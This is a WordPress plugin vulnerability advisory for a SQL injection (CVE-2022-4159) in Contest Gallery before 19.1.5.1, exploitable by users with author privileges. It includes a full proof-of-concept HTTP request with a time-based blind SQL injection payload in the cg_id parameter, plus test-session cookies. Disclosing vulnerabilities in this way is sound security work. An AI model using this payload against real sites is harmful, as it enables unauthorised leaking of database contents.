WordPress Plugin Vulnerabilities

Contest Gallery < 19.1.5.1 - Author+ SQL Injection

Description

The plugins do not escape the cg_id POST parameter before concatenating it to an SQL query in 0_change-gallery.php. This may allow malicious users with at least author privilege to leak sensitive information from the site's database.

Proof of Concept

POST /wp-admin/admin-ajax.php?page=/index.php&edit_gallery=1&wpmadd= HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8080/wp-admin/admin.php?page=contest-gallery%2Findex.php
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------118598741212462970792872549499
Content-Length: 898
Origin: http://localhost:8080
Connection: close
Cookie: wordpress_37d007a56d816107ce5b52c10342db37=pegasus%7C1668532775%7Ce9naGH0Y1x4WXb9vxCjC8JDEhkEcfRIJuC2uoLiJUrE%7Ce93774011f8915e8d1b69955e8c50a905c9040c9c17efcca7b42f24fb32f43e2; wp-settings-time-2=1667954049; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=pegasus%7C1668532775%7Ce9naGH0Y1x4WXb9vxCjC8JDEhkEcfRIJuC2uoLiJUrE%7C2bc19f40221c8d9c3d9219517701a229fe9080215045fe6a050c6d9b594282b3; wp-settings-time-5=1668359977; wp-settings-5=libraryContent%3Dbrowse
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------118598741212462970792872549499
Content-Disposition: form-data; name="action"

post_contest_gallery_action_ajax
-----------------------------118598741212462970792872549499
Content-Disposition: form-data; name="cgBackendHash"

e12e8782da8ac6c4f1725d81a9811524
-----------------------------118598741212462970792872549499
Content-Disposition: form-data; name="cg_id"

1/**/AND/**/(SELECT/**/7741/**/FROM/**/(SELECT(SLEEP(2)))hlAf)
-----------------------------118598741212462970792872549499
Content-Disposition: form-data; name="cg_create"

1
-----------------------------118598741212462970792872549499
Content-Disposition: form-data; name="cgGalleryFormSubmit"

1
-----------------------------118598741212462970792872549499
Content-Disposition: form-data; name="cgIsRealFormSubmit"

1
-----------------------------118598741212462970792872549499--

Affects Plugins

Plugin icon
contest-gallery
Fixed in 19.1.5.1
Plugin icon
contest-gallery-pro
Fixed in 19.1.5.1

References

CVE
CVE-2022-4159
URL
https://bulletin.iese.de/post/contest-gallery_19-1-4-1_8

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
6.8 (medium)

Miscellaneous

Original Researcher
Kunal Sharma (University of Kaiserslautern), Daniel Krohmer (Fraunhofer IESE)
Submitter
Daniel Krohmer
Submitter website
https://iese.fraunhofer.de/en.html
Verified
Yes
WPVDB ID
2e993280-1007-4e9d-9ca6-2b5f774e9965

Timeline

Publicly Published
2022-12-05 (about 1 years ago)
Added
2022-12-05 (about 1 years ago)
Last Updated
2022-12-05 (about 1 years ago)

Other

Published
Title
Published
2015-07-16
Title
Quiz And Survey Master < 4.4.4 - Authenticated Blind SQL Injection
Published
2023-01-19
Title
WP TopBar <= 5.36 - Admin+ SQLi
Published
2022-01-06
Title
WordPress 4.1-5.8.2 - SQL Injection via WP_Meta_Query
Published
2014-10-05
Title
WP eCommerce <= 3.8.7.5 - Unspecified SQL Injection
Published
2019-05-20
Title
FV Flowplayer Video Player < 7.3.15.727 - SQL Injection